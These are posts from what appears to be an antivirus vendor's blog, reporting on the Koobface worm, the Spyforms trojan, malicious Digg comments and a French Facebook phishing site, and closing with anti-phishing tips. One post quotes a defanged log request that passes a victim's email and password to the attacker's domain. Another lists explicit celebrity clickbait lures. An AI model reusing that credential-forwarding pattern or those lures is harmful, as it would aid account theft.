Welcome to Super Antivirus Blog

I am a Jedi. 我：http://sinaurl.cn/hiWzC 化繁成简… 破茧成蝶 Panda Cloud Antivirus 首款基于云的免费防病毒软件

Koobface: The saga continues

The gang behind the Koobface worm has been hard at work in releasing the next iteration of their worm. We've already identified over 60 active domains spreading the content through the usual method of posting a message linking to a "CooooL Video" on Facebook.

Sample malspam:

After clicking the link, the victims are automatically redirected to a Koobface controlled server, which then routes the them off to a fake codec site specifically designed for the social network they came from.

Fake codec site:

The Koobface gang uses the same old "Flash Player upgrade required" tactic to trick users into opening the executable, which then ultimately transforms their machine into a distribution point for the infection to further propagate. 

Koobface connection log:

On infection, the Koobface worm immediately attempts to download three additional exectuable files.

After turning the victims computer into its next distribution point, it also attempts to monetize by installing "Total Security" Rogueware.

Malware Impersonates Classmates and Facebook Websites to Deliver Password Stealing Trojan

Websites designed to look like Classmates.com and Facebook are currently being used to distribute a password stealing Trojan, which we detect as Trj/Spyforms.BZ.   Some of you may remember the Spyforms Malware family from a previous incident involving Barack Obama spam campaigns. In this most recent incident, the malicious web links are still primarily distributed via spam e-mails. Once clicked, the victim is presented with a realistic looking Classmates or Facebook website.  The website contains a fake YouTube video, which prompts a dialog stating “Please Download correct Flash Movie Player!  Installation: Double-click the downloaded installer.  Follow the on-screen instructions!” and attempts to download a file named Adobemedia10.exe or Adobemedia11.exe. 

Once installed, the Trojan intercepts network traffic in order to obtain ftp, icq, pop3, and imap passwords and then sends the data back to a server in a Hong Kong based ISP (HOSTFRESH).  You may recall the last major Malware incident involving the Hong Kong based ISP, which was one of the providers involved in the malware distribution operation taking place inside of the Atrivo/Intercage network.

Ever heard the term "Rickrolling"? Malware distributors have…

Rickrolling is an Internet meme typically involving the music video for the 1987 Rick Astley song "Never Gonna Give You Up". The meme is a bait and switch: a person provides a web link that he or she claims is relevant to the topic at hand, but the link actually takes the user to the Astley video.

Over the past few months we have noticed attacker efforts to maximize blackhat SEO tactics and increase infection rates at the same time by abusing the popular social news aggregate site Digg.com. Digg allows users to create, vote, and comment on news stories.

Malware distributors have been creating false stories with catchy subject lines as an attempt to bait users into clicking links which lead to Malware. In some cases the attackers do not create the news story themselves, rather linking to others relevant content. Below is an example of the attacker (in red) taking advantage of a valid digg submission. The malicious comment reads, "Heath Ledger naked in the shower, playing with herself." and is posted to a relevant story about Heath Ledger. The "playing with herself" part is a bit confusing but my guess is that the attackers are using automation scripts to auto-generate content based on topic relevancy or that they are manually doing this and have no idea who Heath Ledger is.

My initial search identified 52 accounts posting news stories or comments with malicious URI's. The links all point to various fake codec sites, which lead to rogue anti-malware infections. We detect and block the malware as Adware/VideoPlay.

Update: Dancho Danchev reported that there has been over 500,000 malicious comments posted via Digg since last year.

Some of the titles include:

_{Christian Bale freak out dubbed with video!
Christian Bale Terminator Salvation Takes it Up the Ass
Hot and sexy model Mayuko Lwasa in bikini
Pregnant Ujwala Raut in Bikini
megan fox naked secret videos
Sexy Megan Fox having sex Sex Tape, rally nice and hot video
Megan Fox naked NEW SEX TAPE
Robert Pattinson: fotos, vídeos, história
Jessica Simpson Hotel Sex Tape
Batman is Naked aka Christian Bale
Watch Grey's Anatomy Season 5 online here
Breaks Season 4 Episode 9
Emma Watson Nude Video
Watch Emma Watson Sex Tape online here
Paris Hilton Sex Tape Update
VANESSA ANNE HUDGENS NUDE, NAKED GALLERY, EXCLUSIVE 2009
Naked Truth on Celebrity News and Edison Chen Sex Scandal
Paris Hilton sex tape! Paris Hilton nude, naked movie!
Celebrity and Angelina Jolie nude, naked, in bikini, gallery
Tila Tequila topless nude and naked sex-porn gallery
Alyssa Milano nude, naked, sex tape – free gallery!
BRITNEY SPEARS NUDE, BRITNEY SPEARS NAKED & SEX TAPE (CLICK HERE)
Lindsay Lohan's nude Marilyn shoot
Heath Ledger naked in shower, playing with herself!!}

Fake Codec Sites: 

 

New Version of MS Antispyware 2009

 

Facebook Phishing Site Targets French Users

Today I discovered a new Facebook phishing site targeting French users.  The login page looks identical to the official Facebook site, but the phishing site passes the victims credentials through a submission form before redirecting them to the official Facebook login site.

Source:

Connection:

(Passing the victims credentials over to the attacker)

_{GET hxxp://www.facebook-online.com/next.php?charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&locale=fr_FR&email=victim@domain.com&pass=victimpass&pass_placeholder=Mot+de+passe&charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F}

(Redirecting to the official Facebook login page)

_{302 Moved Temporarily to https://login.facebook.com/login.php}

 

Even though this is a run of the mill phishing attack, we have noticed an uptrend of Phishing attacks especially in social networks.  The attackers can do many things with harvested accounts, but one of the most common is to harvest as many accounts as possible before unleashing mass spamvertising or even full blown malware campaigns.

 Tips to Avoid Phishing Attacks on Facebook [Facebook Blog]

• Remember, Facebook will never ask for your password in
  an email, Facebook message, or any medium that isn't the login page.
  Though you will need to re-enter your password when you set a security
  question, change your contact email, or send a virtual gift.
• Be extra aware of weird Wall posts. Don't click on any links—on a Wall or elsewhere—if you don't know where they go.
• Set a security question for yourself on your Account
  page. If somehow something malicious shuts you out of your account, you
  will need the answer to that question in order for our User Operations
  team to let you back in. (If you've already set your security question,
  you won't see a prompt for it on your Account page.)
• Be extra aware of what website you are using to log in to Facebook
  (and other websites). Phishing websites can be made to look like other
  websites (like the Facebook log in page), and might try to disguise
  their urls. Be smart: http://www.facebook.com.profile.a36h8su2m8.info/login
  starts out looking like a legitimate Facebook website, but that
  a36h8su2m8.info part means it's fraudulent. Set and use a browser
  bookmark to make sure you always log in from facebook.com
• If you see a Wall post that looks like spam on a friend's Wall, tell the author to delete it and reset their password immediately.
• Use a modern web browser to benefit from anti-phishing protection
  • Internet Explorer 7
  • Firefox
• Check out opendns.com. This is another method for blocking specific domains that host phishing sites.

Make sure that you have an up-to-date Anti-Malware solution running at all times to prevent Phishing and other types of malicious attacks.